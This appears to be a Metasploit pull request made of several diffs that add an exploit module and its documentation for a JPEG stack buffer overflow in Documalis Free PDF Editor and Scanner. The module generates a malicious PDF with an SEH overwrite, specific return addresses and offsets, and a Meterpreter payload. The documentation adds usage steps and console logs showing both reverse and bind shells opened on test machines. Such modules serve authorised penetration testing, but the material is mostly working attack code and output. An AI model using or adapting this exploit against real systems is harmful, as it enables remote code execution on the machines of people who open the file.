### PR TITLE
Add Documalis Free PDF Editor and Scanner Windows file format exploit

### DIFF
--- a/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md
+++ b/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md
@@ -1,0 +1,81 @@
+
+## Vulnerable Application
+
+  This module exploits a stack-based buffer overflow in Documalis Free PDF Editor v.5.7.2.26  and Documalis Free PDF Scanner v.5.7.2.122. 
+
+## Verification Steps
+
+   1.  Install application on the target machine
+   2.  Start msfconsole
+   3.  Do: `use [exploit/windows/fileformat/documalis_pdf_editor_and_scanner.rb]`
+   4.  Do: `show targets`
+   5.  Do: `0 <Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10>`
+   6.  Do: `1 <Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10>`
+   7.  Do: `set target 0 for Documalis Free PDF Editor and set target 1 for Documalis Free PDF Scanner`
+   8.  Do: `set payload [windows/meterpreter/reverse_tcp]`
+   9.  Do: `set LHOST [IP]`
+   9.  Do: `run`
+   10. Do: `use [exploit/multi/handler]`
+   11. Do: `set payload [windows/meterpreter/reverse_tcp]`
+   12. Do: `set LHOST [IP]`
+   13. Do: `run`
+   14. Copy the generated file to the target machine
+   15. Open Documalis Free PDF Editor  
+   17. Put PDF file drag and drop
+   16. Or select load PDF file
+   15. Open Documalis Free PDF Scanner 
+   16. Select Add and load PDF file
+   You should get a shell.
+
+## Options
+
+  **FILENAME**
+
+  The filename that the shellcode gets written to. Setting a filename is not required, as there is a default name already set.
+
+## Scenarios
+
+### Tested on Win 10 x64 and Windows 7 x64 
+
+
+  Run Exploit 
+
+  ```
+  msf5 > use exploit/windows/fileformat/documalis_pdf_editor_and_scanner
+  msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > show targets
+  Exploit targets:
+
+  Id  Name
+
+  0   <Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10>
+  1   <Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10>
+
+  msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set target 1
+  target => 1
+  msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set payload windows/meterpreter/reverse_tcp
+  payload => windows/meterpreter/reverse_tcp
+  msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set lhost 192.168.199.136
+  lhost => 192.168.199.136
+  msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > exploit
+  [+] msf.pdf stored at C:/Users/exploit/.msf4/local/msf.pdf
+
+  msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > use exploit/multi/handler
+  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
+  payload => windows/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lhost 192.168.199.136
+  lhost => 192.168.199.136
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.199.136:4444
+  [*] Sending stage (180291 bytes) to 192.168.199.1
+  [*] Meterpreter session 1 opened (192.168.199.136:4444 -> 192.168.199.1:51316) at 2020-06-15 21:01:20 +020
+  meterpreter > sysinfo
+  Computer        : DAVID_PC
+  OS              : Windows 10 (10.0 Build 18362).
+  Architecture    : x64
+  System Language : de_DE
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x86/windows
+  meterpreter >
+  ```

--- a/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md
+++ b/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md
@@ -1,81 +1,202 @@
-
 ## Vulnerable Application
 
-  This module exploits a stack-based buffer overflow in Documalis Free PDF Editor v.5.7.2.26  and Documalis Free PDF Scanner v.5.7.2.122. 
+  Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not appropriately
+  validate the contents of JPEG images contained within a PDF. Attackers can exploit this vulnerability to trigger
+  a buffer overflow on the stack and gain remote code execution as the user running the Documalis Free PDF
+  Editor or Documalis Free PDF Scanner software.
 
 ## Verification Steps
 
-   1.  Install application on the target machine
-   2.  Start msfconsole
-   3.  Do: `use [exploit/windows/fileformat/documalis_pdf_editor_and_scanner.rb]`
-   4.  Do: `show targets`
-   5.  Do: `0 <Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10>`
-   6.  Do: `1 <Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10>`
-   7.  Do: `set target 0 for Documalis Free PDF Editor and set target 1 for Documalis Free PDF Scanner`
-   8.  Do: `set payload [windows/meterpreter/reverse_tcp]`
-   9.  Do: `set LHOST [IP]`
-   9.  Do: `run`
-   10. Do: `use [exploit/multi/handler]`
-   11. Do: `set payload [windows/meterpreter/reverse_tcp]`
-   12. Do: `set LHOST [IP]`
+   1. Install application on the target machine
+   2. Start msfconsole
+   3. Do: `use exploit/windows/fileformat/documalis_pdf_editor_and_scanner`
+   4. Do: `set TARGET 0` for Documalis Free PDF Editor or `set TARGET 1` for Documalis Free PDF Scanner
+   5. Do: `set payload windows/meterpreter/bind_tcp`
+   6. Do: `set RHOST [Target IP]`
+   7. Do: `set LPORT [Port to make the target host listen on]`
+   9. Do: `run`
+   10. Do: `use exploit/multi/handler`
+   11. Do: `set payload windows/meterpreter/bind_tcp`
+   12. Do: `set RHOST [Target IP]`
+   13. Do: `set LPORT [Same port as before, this will be the port the target is listening on]`
    13. Do: `run`
    14. Copy the generated file to the target machine
-   15. Open Documalis Free PDF Editor  
-   17. Put PDF file drag and drop
-   16. Or select load PDF file
-   15. Open Documalis Free PDF Scanner 
-   16. Select Add and load PDF file
-   You should get a shell.
+   15. For Documalis Free PDF Editor, drag and drop the PDF to open it. For Documalis Free PDF Scanner, select the Add
+       button on the right side of the screen and then select the malicious PDF file from the file prompt.
+   16. You should get a shell as the user running either Documalis Free PDF Scanner or Documalis Free PDF
+       Editor (depending on which software was exploited).
 
 ## Options
-
   **FILENAME**
-
-  The filename that the shellcode gets written to. Setting a filename is not required, as there is a default name already set.
+  Name of the PDF file that Metasploit will generate. This will default to "msf.pdf", but can be changed.
 
 ## Scenarios
 
-### Tested on Win 10 x64 and Windows 7 x64 
+### Documalis Free PDF Editor v5.7.2.26 on Windows 10 x64 v2004
+```
+msf5 > use exploit/windows/fileformat/documalis_pdf_editor_and_scanner
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set TARGET 0
+TARGET => 0
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set PAYLOAD windows/meterpreter/bind_tcp
+PAYLOAD => windows/meterpreter/bind_tcp
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set RHOST 172.26.215.55
+RHOST => 172.26.215.55
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set LPORT 6655
+LPORT => 6655
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > show options
+
+Module options (exploit/windows/fileformat/documalis_pdf_editor_and_scanner):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   FILENAME          msf.pdf          no        The file name.
+   PDF::Encoder      ASCIIHEX         yes       Select encoder for JavaScript Stream, valid values are ASCII85, FLATE, and ASCIIHEX
+   PDF::Method       DOCUMENT         yes       Select PAGE, DOCUMENT, or ANNOTATION
+   PDF::MultiFilter  1                yes       Stack multiple encodings n times
+   PDF::Obfuscate    true             yes       Whether or not we should obfuscate the output
 
 
-  Run Exploit 
+Payload options (windows/meterpreter/bind_tcp):
 
-  ```
-  msf5 > use exploit/windows/fileformat/documalis_pdf_editor_and_scanner
-  msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > show targets
-  Exploit targets:
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LPORT     6655             yes       The listen port
+   RHOST     172.26.215.55    no        The target address
 
-  Id  Name
+   **DisablePayloadHandler: True   (no handler will be created!)**
 
-  0   <Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10>
-  1   <Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10>
 
-  msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set target 1
-  target => 1
-  msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set payload windows/meterpreter/reverse_tcp
-  payload => windows/meterpreter/reverse_tcp
-  msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set lhost 192.168.199.136
-  lhost => 192.168.199.136
-  msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > exploit
-  [+] msf.pdf stored at C:/Users/exploit/.msf4/local/msf.pdf
+Exploit target:
 
-  msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > use exploit/multi/handler
-  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
-  payload => windows/meterpreter/reverse_tcp
-  msf5 exploit(multi/handler) > set lhost 192.168.199.136
-  lhost => 192.168.199.136
-  msf5 exploit(multi/handler) > run
+   Id  Name
+   --  ----
+   0   Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10
 
-  [*] Started reverse TCP handler on 192.168.199.136:4444
-  [*] Sending stage (180291 bytes) to 192.168.199.1
-  [*] Meterpreter session 1 opened (192.168.199.136:4444 -> 192.168.199.1:51316) at 2020-06-15 21:01:20 +020
-  meterpreter > sysinfo
-  Computer        : DAVID_PC
-  OS              : Windows 10 (10.0 Build 18362).
-  Architecture    : x64
-  System Language : de_DE
-  Domain          : WORKGROUP
-  Logged On Users : 2
-  Meterpreter     : x86/windows
-  meterpreter >
-  ```
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > exploit
+
+[+] msf.pdf stored at /home/gwillcox/.msf4/local/msf.pdf
+[*] Started bind TCP handler against 172.26.215.55:6655
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > use multi/handler
+msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/bind_tcp
+PAYLOAD => windows/meterpreter/bind_tcp
+msf5 exploit(multi/handler) > set LPORT 6655
+LPORT => 6655
+msf5 exploit(multi/handler) > set RHOST 172.26.215.55
+RHOST => 172.26.215.55
+msf5 exploit(multi/handler) > exploit
+
+[*] Started bind TCP handler against 172.26.215.55:6655
+[*] Sending stage (176195 bytes) to 172.26.215.55
+[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.26.215.55:6655) at 2020-07-31 17:05:06 -0500
+
+meterpreter > getuid
+Server username: DESKTOP-KUO5CML\test
+meterpreter > getprivs
+
+Enabled Process Privileges
+==========================
+
+Name
+----
+SeChangeNotifyPrivilege
+SeIncreaseWorkingSetPrivilege
+SeShutdownPrivilege
+SeTimeZonePrivilege
+SeUndockPrivilege
+
+meterpreter > sysinfo
+Computer        : DESKTOP-KUO5CML
+OS              : Windows 10 (10.0 Build 19041).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter >
+```
+
+### Documalis Free PDF Scanner v5.7.2.122 on Windows 10 x64 v2004
+```
+msf5 > use exploit/windows/fileformat/documalis_pdf_editor_and_scanner
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set TARGET 1
+TARGET => 1
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set PAYLOAD windows/meterpreter/bind_tcp
+PAYLOAD => windows/meterpreter/bind_tcp
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set RHOST 172.26.215.55
+RHOST => 172.26.215.55
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set LPORT 7788
+LPORT => 7788
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > show options
+
+Module options (exploit/windows/fileformat/documalis_pdf_editor_and_scanner):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   FILENAME          msf.pdf          no        The file name.
+   PDF::Encoder      ASCIIHEX         yes       Select encoder for JavaScript Stream, valid values are ASCII85, FLATE, and ASCIIHEX
+   PDF::Method       DOCUMENT         yes       Select PAGE, DOCUMENT, or ANNOTATION
+   PDF::MultiFilter  1                yes       Stack multiple encodings n times
+   PDF::Obfuscate    true             yes       Whether or not we should obfuscate the output
+
+
+Payload options (windows/meterpreter/bind_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LPORT     7788             yes       The listen port
+   RHOST     172.26.215.55    no        The target address
+
+   **DisablePayloadHandler: True   (no handler will be created!)**
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10
+
+
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > exploit
+
+[+] msf.pdf stored at /home/gwillcox/.msf4/local/msf.pdf
+[*] Started bind TCP handler against 172.26.215.55:7788
+msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > use multi/handler
+msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
+payload => windows/meterpreter/bind_tcp
+msf5 exploit(multi/handler) > set RHOST 172.26.215.55
+RHOST => 172.26.215.55
+msf5 exploit(multi/handler) > set LPORT 7788
+LPORT => 7788
+msf5 exploit(multi/handler) > exploit
+
+[*] Started bind TCP handler against 172.26.215.55:7788
+[*] Sending stage (176195 bytes) to 172.26.215.55
+[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.26.215.55:7788) at 2020-07-31 17:31:35 -0500
+
+meterpreter > getuid
+Server username: DESKTOP-KUO5CML\test
+meterpreter > getprivs
+
+Enabled Process Privileges
+==========================
+
+Name
+----
+SeChangeNotifyPrivilege
+SeIncreaseWorkingSetPrivilege
+SeShutdownPrivilege
+SeTimeZonePrivilege
+SeUndockPrivilege
+
+meterpreter > sysinfo
+Computer        : DESKTOP-KUO5CML
+OS              : Windows 10 (10.0 Build 19041).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter >
+```

--- a/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
+++ b/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
@@ -37,15 +37,15 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'Targets'         =>
         [
-          ['<Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10>',
+          ['Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10',
            {
-             'Ret' => 0x0040160D, # pop eax # pop ebx # ret  - PDFEditor.exe
+             'Ret' => 0x0040160D, # pop esi # pop ebx # ret  - PDFEditor.exe
              'Offset' => 433
            }
           ],
-          ['<Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10>',
+          ['Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10',
            {
-             'Ret' => 0x004023FC, # #5E POP ESI  - DocumentScanner.exe
+             'Ret' => 0x004023FC, # pop edx # pop ebx # ret  - DocumentScanner.exe
              'Offset' => 433
            }
           ]

--- a/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
+++ b/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
@@ -1,0 +1,120 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::PDF
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'      => 'Documalis Free PDF ',
+      'Description' => %q{Documalis Free PDF Editor and Documalis Free PDF Scanner is prone to a security vulnerability when open PDF files.When the application is used to open a specially crafted PDF file, a buffer overflow occurs allowing arbitrary code execution.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'metacom', # Vulnerability discovery and PoC
+          '<metacom27[at]gmail.com>', # Metasploit module
+        ],
+      'References'      =>
+        [
+          ['EDB', ]
+        ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'process', # none/process/thread/seh
+        },
+      'Platform'        => 'win',
+      'Payload'         =>
+        {
+          'Space' => 2000,
+          'DisableNops' => true
+        },
+      'Targets'         =>
+        [
+          ['<Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10>',
+           {
+             'Ret' => 0x0040160D, # pop eax # pop ebx # ret  - PDFEditor.exe
+             'Offset' => 433
+           }
+          ],
+          ['<Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10>',
+           {
+             'Ret' => 0x004023FC, # #5E POP ESI  - DocumentScanner.exe
+             'Offset' => 433
+           }
+          ]
+        ],
+      'Privileged'      => false,
+      'DisclosureDate'  => 'May 22 2020',
+      'DefaultTarget'   => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
+      ])
+  end
+
+  def exploit
+    file_create(make_pdf)
+  end
+
+  def jpeg
+    buffer = "\xFF\xD8\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65\x00\x64\x80\x00\x00"
+    buffer << "\x00\x02\xFF\xDB\x00\x84\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02"
+    buffer << "\x02\x03\x02\x02\x02\x03\x04\x03\x03\x03\x03\x04\x05\x04\x04\x04"
+    buffer << "\x04\x04\x05\x05\x05\x05\x05\x05\x05\x05\x05\x05\x07\x08\x08\x08"
+    buffer << "\x07\x05\x09\x0A\x0A\x0A\x0A\x09\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C"
+    buffer << "\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x01\x03\x02\x02\x03\x03\x03\x07\x05"
+    buffer << "\x05\x07\x0D\x0A\x09\x0A\x0D\x0F\x0D\x0D\x0D\x0D\x0F\x0F\x0C\x0C"
+    buffer << "\x0C\x0C\x0C\x0F\x0F\x0C\x0C\x0C\x0C\x0C\x0C\x0F\x0C\x0E\x0E\x0E"
+    buffer << "\x0E\x0E\x0C\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11"
+    buffer << "\x11\x11\x11\x11\x11\x11\x11\x11\xFF\xC0\x00\x14\x08\x00\x32\x00"
+    buffer << "\xE6\x04\x01\x11\x00\x02\x11\x01\x03\x11\x01\x04\x11\x00\xFF\xC4"
+    buffer << "\x01\xA2\x00\x00\x00\x07\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00"
+    buffer << "\x00\x00\x00\x04\x05\x03\x02\x06\x01\x00\x07\x08\x09\x0A\x0B\x01"
+    buffer << "\x54\x02\x02\x03\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00"
+    buffer << "\x01\x00\x02\x03\x04\x05\x06\x07"
+    buffer << rand_text(target['Offset']) # junk
+    buffer << generate_seh_record(target.ret)
+    buffer << payload.encoded
+    buffer << rand_text(2388 - payload.encoded.length)
+    buffer
+  end
+
+  def make_pdf
+    @pdf << header
+    add_object(1, "<</Type/Catalog/Outlines 2 0 R /Pages 3 0 R>>")
+    add_object(2, "<</Type/Outlines>>")
+    add_object(3, "<</Type/Pages/Kids[5 0 R]/Count 1/Resources <</ProcSet 4 0 R/XObject <</I0 7 0 R>>>>/MediaBox[0 0 612.0 792.0]>>")
+    add_object(4, "[/PDF/Text/ImageC]")
+    add_object(5, "<</Type/Page/Parent 3 0 R/Contents 6 0 R>>")
+    stream_1 = "stream" << eol
+    stream_1 << "0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q" << eol
+    stream_1 << "endstream" << eol
+    add_object(6, "<</Length 91>>#{stream_1}")
+    stream = "<<" << eol
+    stream << "/Width 230" << eol
+    stream << "/BitsPerComponent 8" << eol
+    stream << "/Name /X" << eol
+    stream << "/Height 50" << eol
+    stream << "/Intent /RelativeColorimetric" << eol
+    stream << "/Subtype /Image" << eol
+    stream << "/Filter /DCTDecode" << eol
+    stream << "/Length #{jpeg.length}" << eol
+    stream << "/ColorSpace /DeviceCMYK" << eol
+    stream << "/Type /XObject" << eol
+    stream << ">>"
+    stream << "stream" << eol
+    stream << jpeg << eol
+    stream << "endstream" << eol
+    add_object(7, stream)
+    finish_pdf
+  end
+end

--- a/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
+++ b/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
@@ -58,6 +58,12 @@ class MetasploitModule < Msf::Exploit::Remote
               }
             ]
           ],
+        'Notes' =>
+          {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+          },
         'Privileged' => false,
         'DisclosureDate' => 'May 22 2020',
         'DefaultTarget' => 0

--- a/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
+++ b/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'DefaultOptions' =>
           {
-            'EXITFUNC' => 'process' 
+            'EXITFUNC' => 'process'
           },
         'Platform' => 'win',
         'Payload' =>

--- a/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
+++ b/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'        => 'win',
       'Payload'         =>
         {
-          'Space' => 2000,
+          'Space' => 1715,
           'DisableNops' => true
         },
       'Targets'         =>
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
     buffer << rand_text(target['Offset']) # junk
     buffer << generate_seh_record(target.ret)
     buffer << payload.encoded
-    buffer << rand_text(2388 - payload.encoded.length)
+    buffer << rand_text(2388 - buffer.length)
     buffer
   end
 

--- a/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
+++ b/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
@@ -29,7 +29,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'References' =>
           [
-            ['CVE', '2020-9999'] # NEED TO FIX THIS STILL
           ],
         'DefaultOptions' =>
           {
@@ -60,9 +59,9 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'Notes' =>
           {
-          'Reliability' => [ REPEATABLE_SESSION ],
-          'Stability' => [ CRASH_SERVICE_DOWN ],
-          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+            'Reliability' => [ REPEATABLE_SESSION ],
+            'Stability' => [ CRASH_SERVICE_DOWN ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK ]
           },
         'Privileged' => false,
         'DisclosureDate' => 'May 22 2020',

--- a/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
+++ b/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
@@ -11,54 +11,64 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Seh
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'      => 'Documalis Free PDF Editor and Scanner JPEG Stack Buffer Overflow',
-      'Description' => %q{Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not appropriately validate the contents of JPEG images contained within a PDF. Attackers can exploit this vulnerability to trigger a buffer overflow on the stack and gain remote code execution as the user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.
-      },
-      'License'         => MSF_LICENSE,
-      'Author'          =>
-        [
-          'metacom', # Vulnerability discovery and PoC
-          '<metacom27[at]gmail.com>', # Metasploit module
-        ],
-      'References'      =>
-        [
-          ['CVE', '2020-XXXX'] # NEED TO FIX THIS STILL
-        ],
-      'DefaultOptions'  =>
-        {
-          'EXITFUNC' => 'process', # none/process/thread/seh
+    super(
+      update_info(
+        info,
+        'Name' => 'Documalis Free PDF Editor and Scanner JPEG Stack Buffer Overflow',
+        'Description' => %q{
+          Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not
+          appropriately validate the contents of JPEG images contained within a PDF. Attackers can exploit
+          this vulnerability to trigger a buffer overflow on the stack and gain remote code execution as the
+          user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.
         },
-      'Platform'        => 'win',
-      'Payload'         =>
-        {
-          'Space' => 1715,
-          'DisableNops' => true
-        },
-      'Targets'         =>
-        [
-          ['Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10',
-           {
-             'Ret' => 0x0040160D, # pop esi # pop ebx # ret  - PDFEditor.exe
-             'Offset' => 433
-           }
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'metacom', # Vulnerability discovery and PoC
+            '<metacom27[at]gmail.com>', # Metasploit module
           ],
-          ['Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10',
-           {
-             'Ret' => 0x004023FC, # pop edx # pop ebx # ret  - DocumentScanner.exe
-             'Offset' => 433
-           }
-          ]
-        ],
-      'Privileged'      => false,
-      'DisclosureDate'  => 'May 22 2020',
-      'DefaultTarget'   => 0
-    ))
+        'References' =>
+          [
+            ['CVE', '2020-XXXX'] # NEED TO FIX THIS STILL
+          ],
+        'DefaultOptions' =>
+          {
+            'EXITFUNC' => 'process' 
+          },
+        'Platform' => 'win',
+        'Payload' =>
+          {
+            'Space' => 1715,
+            'DisableNops' => true
+          },
+        'Targets' =>
+          [
+            [
+              'Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10',
+              {
+                'Ret' => 0x0040160D, # pop esi # pop ebx # ret  - PDFEditor.exe
+                'Offset' => 433
+              }
+            ],
+            [
+              'Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10',
+              {
+                'Ret' => 0x004023FC, # pop edx # pop ebx # ret  - DocumentScanner.exe
+                'Offset' => 433
+              }
+            ]
+          ],
+        'Privileged' => false,
+        'DisclosureDate' => 'May 22 2020',
+        'DefaultTarget' => 0
+      )
+    )
 
     register_options(
       [
         OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
-      ])
+      ]
+    )
   end
 
   def exploit
@@ -90,30 +100,30 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def make_pdf
     @pdf << header
-    add_object(1, "<</Type/Catalog/Outlines 2 0 R /Pages 3 0 R>>")
-    add_object(2, "<</Type/Outlines>>")
-    add_object(3, "<</Type/Pages/Kids[5 0 R]/Count 1/Resources <</ProcSet 4 0 R/XObject <</I0 7 0 R>>>>/MediaBox[0 0 612.0 792.0]>>")
-    add_object(4, "[/PDF/Text/ImageC]")
-    add_object(5, "<</Type/Page/Parent 3 0 R/Contents 6 0 R>>")
-    stream_1 = "stream" << eol
-    stream_1 << "0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q" << eol
-    stream_1 << "endstream" << eol
+    add_object(1, '<</Type/Catalog/Outlines 2 0 R /Pages 3 0 R>>')
+    add_object(2, '<</Type/Outlines>>')
+    add_object(3, '<</Type/Pages/Kids[5 0 R]/Count 1/Resources <</ProcSet 4 0 R/XObject <</I0 7 0 R>>>>/MediaBox[0 0 612.0 792.0]>>')
+    add_object(4, '[/PDF/Text/ImageC]')
+    add_object(5, '<</Type/Page/Parent 3 0 R/Contents 6 0 R>>')
+    stream_1 = 'stream' << eol
+    stream_1 << '0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q' << eol
+    stream_1 << 'endstream' << eol
     add_object(6, "<</Length 91>>#{stream_1}")
-    stream = "<<" << eol
-    stream << "/Width 230" << eol
-    stream << "/BitsPerComponent 8" << eol
-    stream << "/Name /X" << eol
-    stream << "/Height 50" << eol
-    stream << "/Intent /RelativeColorimetric" << eol
-    stream << "/Subtype /Image" << eol
-    stream << "/Filter /DCTDecode" << eol
+    stream = '<<' << eol
+    stream << '/Width 230' << eol
+    stream << '/BitsPerComponent 8' << eol
+    stream << '/Name /X' << eol
+    stream << '/Height 50' << eol
+    stream << '/Intent /RelativeColorimetric' << eol
+    stream << '/Subtype /Image' << eol
+    stream << '/Filter /DCTDecode' << eol
     stream << "/Length #{jpeg.length}" << eol
-    stream << "/ColorSpace /DeviceCMYK" << eol
-    stream << "/Type /XObject" << eol
-    stream << ">>"
-    stream << "stream" << eol
+    stream << '/ColorSpace /DeviceCMYK' << eol
+    stream << '/Type /XObject' << eol
+    stream << '>>'
+    stream << 'stream' << eol
     stream << jpeg << eol
-    stream << "endstream" << eol
+    stream << 'endstream' << eol
     add_object(7, stream)
     finish_pdf
   end

--- a/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
+++ b/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb
@@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'      => 'Documalis Free PDF ',
-      'Description' => %q{Documalis Free PDF Editor and Documalis Free PDF Scanner is prone to a security vulnerability when open PDF files.When the application is used to open a specially crafted PDF file, a buffer overflow occurs allowing arbitrary code execution.
+      'Name'      => 'Documalis Free PDF Editor and Scanner JPEG Stack Buffer Overflow',
+      'Description' => %q{Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not appropriately validate the contents of JPEG images contained within a PDF. Attackers can exploit this vulnerability to trigger a buffer overflow on the stack and gain remote code execution as the user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.
       },
       'License'         => MSF_LICENSE,
       'Author'          =>
